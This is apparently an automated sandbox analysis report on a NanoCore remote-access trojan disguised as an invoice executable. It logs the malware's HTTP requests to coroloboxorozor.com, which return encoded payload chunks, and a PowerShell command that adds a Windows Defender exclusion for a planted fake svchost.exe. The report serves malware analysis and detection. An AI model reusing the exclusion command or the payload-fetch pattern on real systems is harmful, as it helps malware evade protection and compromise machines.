                                                                                                Data Raw: 63 35 63 0d 0a 3c 70 3e 4b 4b 53 66 48 53 56 74 74 53 48 53 58 53 48 53 48 53 48 53 74 53 48 53 48 53 48 53 67 55 55 53 67 55 55 53 48 53 48 53 56 51 74 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 77 74 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 56 67 51 53 48 53 48 53 48 53 56 74 53 58 56 53 56 51 77 53 56 74 53 48 53 56 51 48 53 66 53 67 48 55 53 58 58 53 56 51 74 53 56 53 4b 77 53 67 48 55 53 58 58 53 51 74 53 56 48 74 53 56 48 55 53 56 56 55 53 58 67 53 56 56 67 53 56 56 74 53 56 56 56 53 56 48 58 53 56 56 74 53 66 4b 53 56 48 66 53 58 67 53 66 66 53 66 4b 53 56 56 48 53 56 56 48 53 56 56 56 53 56 56 77 53 58 67 53 66 51 53 56 48 56 53 58 67 53 56 56 74 53 56 56 4b 53 56 56 48 53 58 67 53 56 48 55 53 56 56 48 53 58 67 53 77 51 53 4b 66 53 51 58 53 58 67 53 56 48 66 53 56 56 56 53 56 48 48 53 56 48 56 53 74 77 53 56 58 53 56 58 53 56 48 53 58 77 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 51 48 53 77 66 53 48 53 48 53 4b 77 53 56 53 58 53 48 53 4b 77 53 56 74 67 53 74 56 53 56 51 48 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 67 67 74 53 48 53 58 74 53 48 53 56 56 53 56 53 51 48 53 48 53 48 53 56 58 74 53 56 48 53 48 53 48 53 77 53 48 53 48 53 48 53 48 53 48 53 48 53 56 66 48 53 56 77 55 53 56 48 53 48 53 48 53 58 67 53 48 53 48 53 48 53 56 66 67 53 56 48 53 48 53 48 53 48 53 48 53 56 67 51 53 48 53 58 67 53 48 53 48 53 48 53 67 53 48 53 48 53 74 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 74 53 48 53 48 53 48 53
                                                                                                Data Ascii: c5c<p>KKSfHSVttSHSXSHSHSHStSHSHSHSgUUSgUUSHSHSVQtSHSHSHSHSHSHSHSwtSHSHSHSHSHSHSHSHSHSHSHSHSHSHSHSHSHSHSHSHSHSHSHSHSHSHSHSHSHSHSHSHSHSHSHSVgQSHSHSHSVtSXVSVQwSVtSHSVQHSfSgHUSXXSVQtSVSKwSgHUSXXSQtSVHtSVHUSVVUSXgSVVgSVVtSVVVSVHXSVVtSfKSVHfSXgSffSfKSVVHSVVHSVVVSVVwSXgSfQSVHVSXgSVVtSVVKSVVHSXgSVHUSVVHSXgSwQSKfSQXSXgSVHfSVVVSVHHSVHVStwSVXSVXSVHSXwSHSHSHSHSHSHSHSQHSwfSHSHSKwSVSXSHSKwSVtgStVSVQHSHSHSHSHSHSHSHSHSggtSHSXtSHSVVSVSQHSHSHSVXtSVHSHSHSwSHSHSHSHSHSHSVfHSVwUSVHSHSHSXgSHSHSHSVfgSVHSHSHSHSHSVgQSHSXgSHSHSHSgSHSHStSHSHSHSHSHSHSHStSHSHSHS
                                                                                                Feb 23, 2021 15:31:13.693099976 CET7255OUTGET /base/320AB9634C12E7907B8FA24F3948BF4F.html HTTP/1.1
                                                                                                Host: coroloboxorozor.com
                                                                                                Feb 23, 2021 15:31:13.822094917 CET7257INHTTP/1.1 200 OK
                                                                                                Date: Tue, 23 Feb 2021 14:31:13 GMT
                                                                                                Content-Type: text/html
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Set-Cookie: __cfduid=d4e3a67d1b9f468c9ad5bce1e6f0001db1614090673; expires=Thu, 25-Mar-21 14:31:13 GMT; path=/; domain=.coroloboxorozor.com; HttpOnly; SameSite=Lax
                                                                                                Last-Modified: Tue, 23 Feb 2021 00:43:17 GMT
                                                                                                Vary: Accept-Encoding
                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                cf-request-id: 0870e6364600000b479f2e0000000001
                                                                                                Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=nBgvQWNaVKfxLg9OCDCwrGDPM3h8wKA0SRqVkZK2pRFDBPVcKq9PpmBvh48Jg%2BQxK9VJElTVM2Pu2YtKHj1bRpkpIuyBLnEtW9%2B6zSy9Lpznp62t"}],"max_age":604800}
                                                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 6261a636de4d0b47-AMS
                                                                                                Data Raw: 37 63 38 66 0d 0a 3c 70 3e 58 74 53 4b 55 53 4b 56 53 56 4b 67 53 56 74 56 53 56 51 48 53 56 4b 67 53 56 55 66 53 55 67 53 67 74 51 53 66 77 53 51 48 53 67 74 51 53 58 51 53 56 77 67 53 55 55 53 56 74 56 53 58 55 53 4b 66 53 67 67 67 53 56 67 56 53 56 77 58 53 56 55 4b 53 56 55 56 53 56 66 53 67 48 48 53 56 58 74 53 51 55 53 56 67 4b 53 77 48 53 58 51 53 56 77 48 53 67 74 55 53 55 58 53 67 66 53 67 4b 53 77 74 53 56 74 58 53 77 51 53 58 56 53 67 67 56 53 56 74 51 53 56 58 4b 53 56 51 66 53 58 4b 53 56 77 58 53 66 66 53 56 67 55 53 56 74 51 53 56 48 4b 53 56 56 58 53 56 51 51 53 67 74 77 53 56 48 74 53 56 53 4b 66 53 56 4b 77 53 67 74 48 53 55 58 53 67 56 4b 53 66 55 53 74 77 53 67 67 66 53 56 56 56 53 66 53 56 58 56 53 67 56 48 53 56 56 56 53 56 48 48 53 56 56 77 53 56 51 4b 53 4b 48 53 67 67 48 53 56 56 53 51 74 53 56 56 74 53 51 55 53 56 67 74 53 56 77 51 53 56 48 77 53 56 51 55 53 56 58 58 53 56 67 56 53 56 51 74 53 56 74 48 53 56 77 74 53 67 56 58 53 56 48 4b 53 55 48 53 67 74 55 53 56 77 66 53 67 67 74 53 56 58 77 53 66 4b 53 48 53 56 66 67 53 67 48 48 53 56 67 58 53 67 48 53 56 77 51 53 67 48 48 53 51 58 53 56 51 48 53 56 67 77 53 56 58 66 53 67 67 74 53 56 67 55 53 56 4b 77 53 51 4b 53 56 67 4b 53 58 58 53 56 56 51 53 51 58 53 77 48 53 67 67 66 53 67 67 55 53 56 51 66 53 55 53 51 77 53 74 4b 53 67 56 77 53 67 67 56 53 67 67 74 53 67 58 53 56 66 53 56 67 53 51 4b 53 67 67 56 53 56 58 55 53 56 4b 4b 53 67 4b 53 67 48 51 53 56 55 77 53 56 66 56 53 67 74 4b 53 67 55 56 53 77 77 53 51 56 53 56 77 74 53 55 55 53 67 74 48 53 67 74 53 67 74 66 53 67 4b 53 56 67 67 53 56 58 48 53 67 74 56 53 67 48 55
                                                                                                Data Ascii: 7c8f<p>XtSKUSKVSVKgSVtVSVQHSVKgSVUfSUgSgtQSfwSQHSgtQSXQSVwgSUUSVtVSXUSKfSgggSVgVSVwXSVUKSVUVSVfSgHHSVXtSQUSVgKSwHSXQSVwHSgtUSUXSgfSgKSwtSVtXSwQSXVSggVSVtQSVXKSVQfSXKSVwXSffSVgUSVtQSVHKSVVXSVQQSgtwSVHtSVSKfSVKwSgtHSUXSgVKSfUStwSggfSVVVSfSVXVSgVHSVVVSVHHSVVwSVQKSKHSggHSVVSQtSVVtSQUSVgtSVwQSVHwSVQUSVXXSVgVSVQtSVtHSVwtSgVXSVHKSUHSgtUSVwfSggtSVXwSfKSHSVfgSgHHSVgXSgHSVwQSgHHSQXSVQHSVgwSVXfSggtSVgUSVKwSQKSVgKSXXSVVQSQXSwHSggfSggUSVQfSUSQwStKSgVwSggVSggtSgXSVfSVgSQKSggVSVXUSVKKSgKSgHQSVUwSVfVSgtKSgUVSwwSQVSVwtSUUSgtHSgtSgtfSgKSVggSVXHSgtVSgHU
                                                                                                Feb 23, 2021 15:31:25.407396078 CET8319OUTGET /base/EFDD2E5486C74022C50C219C9576AB0D.html HTTP/1.1
                                                                                                Host: coroloboxorozor.com
                                                                                                Feb 23, 2021 15:31:25.583986998 CET8321INHTTP/1.1 200 OK
                                                                                                Date: Tue, 23 Feb 2021 14:31:25 GMT
                                                                                                Content-Type: text/html
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Set-Cookie: __cfduid=d9be56e149265349b5097e318a8386c971614090685; expires=Thu, 25-Mar-21 14:31:25 GMT; path=/; domain=.coroloboxorozor.com; HttpOnly; SameSite=Lax
                                                                                                Last-Modified: Tue, 23 Feb 2021 00:43:19 GMT
                                                                                                Vary: Accept-Encoding
                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                cf-request-id: 0870e6640600000b472fac8000000001
                                                                                                Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=kXYVLxhiCoY3NiasWrZGzRT6Zlkd%2B8OvyVck1nPQeB4PX%2F8ry8J9u9%2BluFsEbwOXLtHIzKe0GHac34xk%2F0AQfUessr%2B2ydyDunsCty0sB0GRd%2BvY"}],"max_age":604800}
                                                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 6261a6800d850b47-AMS
                                                                                                Data Raw: 32 31 31 65 0d 0a 3c 70 3e 55 74 53 48 53 55 55 53 48 53 74 66 53 48 53 48 53 58 4b 53 55 56 53 67 67 4b 53 4b 55 53 67 67 4b 53 51 58 53 67 67 4b 53 56 51 53 67 67 4b 53 56 77 53 67 67 4b 53 74 51 53 67 67 4b 53 77 51 53 67 67 4b 53 4b 51 53 67 67 4b 53 77 55 53 67 67 4b 53 77 56 53 67 67 4b 53 77 74 53 67 67 4b 53 58 56 53 67 67 4b 53 4b 55 53 67 67 4b 53 4b 74 53 67 67 4b 53 51 48 53 67 67 4b 53 77 55 53 67 67 4b 53 51 74 53 67 67 4b 53 51 48 53 67 67 4b 53 56 53 56 56 53 55 58 53 48 53 55 77 53 48 53 74 51 53 48 53 55 55 53 48 53 55 74 53 48 53 48 53 56 55 53 55 67 53 67 55 58 53 77 67 53 67 55 58 53 55 58 53 67 55 58 53 67 55 55 53 67 55 67 53 55 74 53 67 55 58 53 4b 58 53 67 55 58 53 55 74 53 67 55 58 53 56 53 56 56 53 55 74 53 48 53 55 67 53 48 53 55 55 53 48 53 55 48 53 48 53 74 66 53 48 53 48 53 67 55 53 67 4b 53 58 74 53 4b 66 53 58 74 53 56 67 53 58 74 53 66 77 53 58 74 53 51 55 53 58 74 53 51 66 53 58 74 53 51 56 53 58 74 53 66 56 53 58 74 53 66 4b 53 58 74 53 66 77 53 58 74 53 56 67 53 58 74 53 67 66 53 58 74 53 56 53 66 53 55 77 53 48 53 55 74 53 48 53 55 77 53 48 53 55 67 53 48 53 48 53 58 56 53 56 74 67 53 56 67 66 53 56 74 66 53 56 67 66 53 56 74 77 53 56 67 66 53 56 48 67 53 56 67 66 53 56 74 66 53 56 67 66 53 56 74 77 53 56 67 66 53 56 74 66 53 56 67 66 53 56 74 77 53 56 67 66 53 56 48 67 53 56 67 66 53 56 74 66 53 56 67 66 53 56 74 77 53 56 67 66 53 56 74 66 53 56 67 66 53 56 74 77 53 56 67 66 53 56 74 66 53 56 67 66 53 56 48 67 53 56 67 66 53 56 53 56 56 53 55 56 53 48 53 55 56 53 48 53 74 51 53 48 53 55 4b 53 48 53 55 67 53 48 53 48 53 58 56 53 56 56 53
                                                                                                Data Ascii: 211e<p>UtSHSUUSHStfSHSHSXKSUVSggKSKUSggKSQXSggKSVQSggKSVwSggKStQSggKSwQSggKSKQSggKSwUSggKSwVSggKSwtSggKSXVSggKSKUSggKSKtSggKSQHSggKSwUSggKSQtSggKSQHSggKSVSVVSUXSHSUwSHStQSHSUUSHSUtSHSHSVUSUgSgUXSwgSgUXSUXSgUXSgUUSgUgSUtSgUXSKXSgUXSUtSgUXSVSVVSUtSHSUgSHSUUSHSUHSHStfSHSHSgUSgKSXtSKfSXtSVgSXtSfwSXtSQUSXtSQfSXtSQVSXtSfVSXtSfKSXtSfwSXtSVgSXtSgfSXtSVSfSUwSHSUtSHSUwSHSUgSHSHSXVSVtgSVgfSVtfSVgfSVtwSVgfSVHgSVgfSVtfSVgfSVtwSVgfSVtfSVgfSVtwSVgfSVHgSVgfSVtfSVgfSVtwSVgfSVtfSVgfSVtwSVgfSVtfSVgfSVHgSVgfSVSVVSUVSHSUVSHStQSHSUKSHSUgSHSHSXVSVVS


                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                2192.168.2.449755172.67.172.1780C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe
                                                                                                TimestampkBytes transferredDirectionData
                                                                                                Feb 23, 2021 15:31:25.584100962 CET8328OUTGET /base/A665A0731C4748264DB5C2625CAB61D4.html HTTP/1.1
                                                                                                Host: coroloboxorozor.com
                                                                                                Connection: Keep-Alive
                                                                                                Feb 23, 2021 15:31:25.705216885 CET8349INHTTP/1.1 200 OK
                                                                                                Date: Tue, 23 Feb 2021 14:31:25 GMT
                                                                                                Content-Type: text/html
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Set-Cookie: __cfduid=d7f3cedd84c1b038d1bc428cb32d295fd1614090685; expires=Thu, 25-Mar-21 14:31:25 GMT; path=/; domain=.coroloboxorozor.com; HttpOnly; SameSite=Lax
                                                                                                Last-Modified: Tue, 23 Feb 2021 00:43:13 GMT
                                                                                                Vary: Accept-Encoding
                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                cf-request-id: 0870e664b500009be52ab90000000001
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=g0Au%2FZc%2F%2BpSHWZsH9JCohdjpo64bGl0vdCXZ1AwN6cDAkn4AllpWbNTepjnTjnLG5a0qSDtYbIObzoaOUNfXhqDn8X8T%2ByKVLgRYnAoEvX9lqmbb"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 6261a6812a039be5-AMS
                                                                                                Data Raw: 63 35 63 0d 0a 3c 70 3e 4b 4b 53 66 48 53 56 74 74 53 48 53 58 53 48 53 48 53 48 53 74 53 48 53 48 53 48 53 67 55 55 53 67 55 55 53 48 53 48 53 56 51 74 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 77 74 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 56 67 51 53 48 53 48 53 48 53 56 74 53 58 56 53 56 51 77 53 56 74 53 48 53 56 51 48 53 66 53 67 48 55 53 58 58 53 56 51 74 53 56 53 4b 77 53 67 48 55 53 58 58 53 51 74 53 56 48 74 53 56 48 55 53 56 56 55 53 58 67 53 56 56 67 53 56 56 74 53 56 56 56 53 56 48 58 53 56 56 74 53 66 4b 53 56 48 66 53 58 67 53 66 66 53 66 4b 53 56 56 48 53 56 56 48 53 56 56 56 53 56 56 77 53 58 67 53 66 51 53 56 48 56 53 58 67 53 56 56 74 53 56 56 4b 53 56 56 48 53 58 67 53 56 48 55 53 56 56 48 53 58 67 53 77 51 53 4b 66 53 51 58 53 58 67 53 56 48 66 53 56 56 56 53 56 48 48 53 56 48 56 53 74 77 53 56 58 53 56 58 53 56 48 53 58 77 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 51 48 53 77 66 53 48 53 48 53 4b 77 53 56 53 58 53 48 53 4b 77 53 56 74 67 53 74 56 53 56 51 48 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 67 67 74 53 48 53 58 74 53 48 53 56 56 53 56 53 51 48 53 48 53 48 53 56 58 74 53 56 48 53 48 53 48 53 77 53 48 53 48 53 48 53 48 53 48 53 48 53 56 66 48 53 56 77 55 53 56 48 53 48 53 48 53 58 67 53 48 53 48 53 48 53 56 66 67 53 56 48 53 48 53 48 53 48 53 48 53 56 67 51 53 48 53 58 67 53 48 53 48 53 48 53 67 53 48 53 48 53 74 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 74 53 48 53 48 53
                                                                                                Data Ascii: c5c<p>KKSfHSVttSHSXSHSHSHStSHSHSHSgUUSgUUSHSHSVQtSHSHSHSHSHSHSHSwtSHSHSHSHSHSHSHSHSHSHSHSHSHSHSHSHSHSHSHSHSHSHSHSHSHSHSHSHSHSHSHSHSHSHSHSVgQSHSHSHSVtSXVSVQwSVtSHSVQHSfSgHUSXXSVQtSVSKwSgHUSXXSQtSVHtSVHUSVVUSXgSVVgSVVtSVVVSVHXSVVtSfKSVHfSXgSffSfKSVVHSVVHSVVVSVVwSXgSfQSVHVSXgSVVtSVVKSVVHSXgSVHUSVVHSXgSwQSKfSQXSXgSVHfSVVVSVHHSVHVStwSVXSVXSVHSXwSHSHSHSHSHSHSHSQHSwfSHSHSKwSVSXSHSKwSVtgStVSVQHSHSHSHSHSHSHSHSHSggtSHSXtSHSVVSVSQHSHSHSVXtSVHSHSHSwSHSHSHSHSHSHSVfHSVwUSVHSHSHSXgSHSHSHSVfgSVHSHSHSHSHSVgQSHSXgSHSHSHSgSHSHStSHSHSHSHSHSHSHStSHSHS
                                                                                                Feb 23, 2021 15:31:26.194781065 CET9409OUTGET /base/320AB9634C12E7907B8FA24F3948BF4F.html HTTP/1.1
                                                                                                Host: coroloboxorozor.com
                                                                                                Feb 23, 2021 15:31:26.316340923 CET9411INHTTP/1.1 200 OK
                                                                                                Date: Tue, 23 Feb 2021 14:31:26 GMT
                                                                                                Content-Type: text/html
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Set-Cookie: __cfduid=d462641f38890e68183dcd6962c945dcb1614090686; expires=Thu, 25-Mar-21 14:31:26 GMT; path=/; domain=.coroloboxorozor.com; HttpOnly; SameSite=Lax
                                                                                                Last-Modified: Tue, 23 Feb 2021 00:43:17 GMT
                                                                                                Vary: Accept-Encoding
                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                cf-request-id: 0870e6671700009be54e87f000000001
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=xBmmAOphK6e6ThMuA4f71B1EqTxGnVymuGd%2B4RVKsa5G%2FjN31PyiTip5s%2FXk84b3yQfB4ZA7DTBb%2BnRu4A8cmobNnMYjUPKm1hlM2qZZvFNJVTkj"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 6261a684fc019be5-AMS
                                                                                                Data Raw: 33 32 38 35 0d 0a 3c 70 3e 58 74 53 4b 55 53 4b 56 53 56 4b 67 53 56 74 56 53 56 51 48 53 56 4b 67 53 56 55 66 53 55 67 53 67 74 51 53 66 77 53 51 48 53 67 74 51 53 58 51 53 56 77 67 53 55 55 53 56 74 56 53 58 55 53 4b 66 53 67 67 67 53 56 67 56 53 56 77 58 53 56 55 4b 53 56 55 56 53 56 66 53 67 48 48 53 56 58 74 53 51 55 53 56 67 4b 53 77 48 53 58 51 53 56 77 48 53 67 74 55 53 55 58 53 67 66 53 67 4b 53 77 74 53 56 74 58 53 77 51 53 58 56 53 67 67 56 53 56 74 51 53 56 58 4b 53 56 51 66 53 58 4b 53 56 77 58 53 66 66 53 56 67 55 53 56 74 51 53 56 48 4b 53 56 56 58 53 56 51 51 53 67 74 77 53 56 48 74 53 56 53 4b 66 53 56 4b 77 53 67 74 48 53 55 58 53 67 56 4b 53 66 55 53 74 77 53 67 67 66 53 56 56 56 53 66 53 56 58 56 53 67 56 48 53 56 56 56 53 56 48 48 53 56 56 77 53 56 51 4b 53 4b 48 53 67 67 48 53 56 56 53 51 74 53 56 56 74 53 51 55 53 56 67 74 53 56 77 51 53 56 48 77 53 56 51 55 53 56 58 58 53 56 67 56 53 56 51 74 53 56 74 48 53 56 77 74 53 67 56 58 53 56 48 4b 53 55 48 53 67 74 55 53 56 77 66 53 67 67 74 53 56 58 77 53 66 4b 53 48 53 56 66 67 53 67 48 48 53 56 67 58 53 67 48 53 56 77 51 53 67 48 48 53 51 58 53 56 51 48 53 56 67 77 53 56 58 66 53 67 67 74 53 56 67 55 53 56 4b 77 53 51 4b 53 56 67 4b 53 58 58 53 56 56 51 53 51 58 53 77 48 53 67 67 66 53 67 67 55 53 56 51 66 53 55 53 51 77 53 74 4b 53 67 56 77 53 67 67 56 53 67 67 74 53 67 58 53 56 66 53 56 67 53 51 4b 53 67 67 56 53 56 58 55 53 56 4b 4b 53 67 4b 53 67 48 51 53 56 55 77 53 56 66 56 53 67 74 4b 53 67 55 56 53 77 77 53 51 56 53 56 77 74 53 55 55 53 67 74 48 53 67 74 53 67 74 66 53 67 4b 53 56 67 67 53 56 58 48 53 67 74 56
                                                                                                Data Ascii: 3285<p>XtSKUSKVSVKgSVtVSVQHSVKgSVUfSUgSgtQSfwSQHSgtQSXQSVwgSUUSVtVSXUSKfSgggSVgVSVwXSVUKSVUVSVfSgHHSVXtSQUSVgKSwHSXQSVwHSgtUSUXSgfSgKSwtSVtXSwQSXVSggVSVtQSVXKSVQfSXKSVwXSffSVgUSVtQSVHKSVVXSVQQSgtwSVHtSVSKfSVKwSgtHSUXSgVKSfUStwSggfSVVVSfSVXVSgVHSVVVSVHHSVVwSVQKSKHSggHSVVSQtSVVtSQUSVgtSVwQSVHwSVQUSVXXSVgVSVQtSVtHSVwtSgVXSVHKSUHSgtUSVwfSggtSVXwSfKSHSVfgSgHHSVgXSgHSVwQSgHHSQXSVQHSVgwSVXfSggtSVgUSVKwSQKSVgKSXXSVVQSQXSwHSggfSggUSVQfSUSQwStKSgVwSggVSggtSgXSVfSVgSQKSggVSVXUSVKKSgKSgHQSVUwSVfVSgtKSgUVSwwSQVSVwtSUUSgtHSgtSgtfSgKSVggSVXHSgtV
                                                                                                Feb 23, 2021 15:31:26.553798914 CET10471OUTGET /base/EFDD2E5486C74022C50C219C9576AB0D.html HTTP/1.1
                                                                                                Host: coroloboxorozor.com
                                                                                                Feb 23, 2021 15:31:26.655714989 CET10472INHTTP/1.1 200 OK
                                                                                                Date: Tue, 23 Feb 2021 14:31:26 GMT
                                                                                                Content-Type: text/html
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Set-Cookie: __cfduid=d462641f38890e68183dcd6962c945dcb1614090686; expires=Thu, 25-Mar-21 14:31:26 GMT; path=/; domain=.coroloboxorozor.com; HttpOnly; SameSite=Lax
                                                                                                last-modified: Tue, 23 Feb 2021 00:43:19 GMT
                                                                                                vary: Accept-Encoding
                                                                                                x-frame-options: SAMEORIGIN
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                cf-request-id: 0870e6687f00009be54a848000000001
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=9bomtBVj8GEZrPe0JG8yPnhbHgAf6bA2bHCDLLfnK9DdKju6oSvONdz2vz2BdFklyMgitMTdAVNM9QjU6GNAbKa86lfwZmSYeKcEo6JiSLcAt4DR"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 6261a6873d3e9be5-AMS
                                                                                                Data Raw: 66 66 64 0d 0a 3c 70 3e 55 74 53 48 53 55 55 53 48 53 74 66 53 48 53 48 53 58 4b 53 55 56 53 67 67 4b 53 4b 55 53 67 67 4b 53 51 58 53 67 67 4b 53 56 51 53 67 67 4b 53 56 77 53 67 67 4b 53 74 51 53 67 67 4b 53 77 51 53 67 67 4b 53 4b 51 53 67 67 4b 53 77 55 53 67 67 4b 53 77 56 53 67 67 4b 53 77 74 53 67 67 4b 53 58 56 53 67 67 4b 53 4b 55 53 67 67 4b 53 4b 74 53 67 67 4b 53 51 48 53 67 67 4b 53 77 55 53 67 67 4b 53 51 74 53 67 67 4b 53 51 48 53 67 67 4b 53 56 53 56 56 53 55 58 53 48 53 55 77 53 48 53 74 51 53 48 53 55 55 53 48 53 55 74 53 48 53 48 53 56 55 53 55 67 53 67 55 58 53 77 67 53 67 55 58 53 55 58 53 67 55 58 53 67 55 55 53 67 55 67 53 55 74 53 67 55 58 53 4b 58 53 67 55 58 53 55 74 53 67 55 58 53 56 53 56 56 53 55 74 53 48 53 55 67 53 48 53 55 55 53 48 53 55 48 53 48 53 74 66 53 48 53 48 53 67 55 53 67 4b 53 58 74 53 4b 66 53 58 74 53 56 67 53 58 74 53 66 77 53 58 74 53 51 55 53 58 74 53 51 66 53 58 74 53 51 56 53 58 74 53 66 56 53 58 74 53 66 4b 53 58 74 53 66 77 53 58 74 53 56 67 53 58 74 53 67 66 53 58 74 53 56 53 66 53 55 77 53 48 53 55 74 53 48 53 55 77 53 48 53 55 67 53 48 53 48 53 58 56 53 56 74 67 53 56 67 66 53 56 74 66 53 56 67 66 53 56 74 77 53 56 67 66 53 56 48 67 53 56 67 66 53 56 74 66 53 56 67 66 53 56 74 77 53 56 67 66 53 56 74 66 53 56 67 66 53 56 74 77 53 56 67 66 53 56 48 67 53 56 67 66 53 56 74 66 53 56 67 66 53 56 74 77 53 56 67 66 53 56 74 66 53 56 67 66 53 56 74 77 53 56 67 66 53 56 74 66 53 56 67 66 53 56 48 67 53 56 67 66 53 56 53 56 56 53 55 56 53 48 53 55 56 53 48 53 74 51 53 48 53 55 4b 53 48 53 55 67 53 48 53 48 53 58 56 53 56 56 53 56 4b 53 56 51 53 56 4b 53 56 55 53 56
                                                                                                Data Ascii: ffd<p>UtSHSUUSHStfSHSHSXKSUVSggKSKUSggKSQXSggKSVQSggKSVwSggKStQSggKSwQSggKSKQSggKSwUSggKSwVSggKSwtSggKSXVSggKSKUSggKSKtSggKSQHSggKSwUSggKSQtSggKSQHSggKSVSVVSUXSHSUwSHStQSHSUUSHSUtSHSHSVUSUgSgUXSwgSgUXSUXSgUXSgUUSgUgSUtSgUXSKXSgUXSUtSgUXSVSVVSUtSHSUgSHSUUSHSUHSHStfSHSHSgUSgKSXtSKfSXtSVgSXtSfwSXtSQUSXtSQfSXtSQVSXtSfVSXtSfKSXtSfwSXtSVgSXtSgfSXtSVSfSUwSHSUtSHSUwSHSUgSHSHSXVSVtgSVgfSVtfSVgfSVtwSVgfSVHgSVgfSVtfSVgfSVtwSVgfSVtfSVgfSVtwSVgfSVHgSVgfSVtfSVgfSVtwSVgfSVtfSVgfSVtwSVgfSVtfSVgfSVHgSVgfSVSVVSUVSHSUVSHStQSHSUKSHSUgSHSHSXVSVVSVKSVQSVKSVUSV


                                                                                                Code Manipulations

                                                                                                Statistics

                                                                                                Behavior

                                                                                                Click to jump to process

                                                                                                System Behavior

                                                                                                General

                                                                                                Start time:15:30:28
                                                                                                Start date:23/02/2021
                                                                                                Path:C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:'C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe'
                                                                                                Imagebase:0xd70000
                                                                                                File size:634024 bytes
                                                                                                MD5 hash:E9CD061B2286D8098153C9D9E2ED0B4B
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:.Net C# or VB.NET
                                                                                                Yara matches:
                                                                                                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000002.960780301.0000000004E97000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000002.960780301.0000000004E97000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                • Rule: NanoCore, Description: unknown, Source: 00000000.00000002.960780301.0000000004E97000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                Reputation:low

                                                                                                General

                                                                                                Start time:15:30:39
                                                                                                Start date:23/02/2021
                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                Imagebase:0x7ff6eb840000
                                                                                                File size:51288 bytes
                                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high

                                                                                                General

                                                                                                Start time:15:30:43
                                                                                                Start date:23/02/2021
                                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe' -Force
                                                                                                Imagebase:0x20000
                                                                                                File size:430592 bytes
                                                                                                MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:.Net C# or VB.NET
                                                                                                Reputation:high

                                                                                                General

                                                                                                Start time:15:30:44
                                                                                                Start date:23/02/2021
                                                                                                Path:C:\Windows\System32\conhost.exe
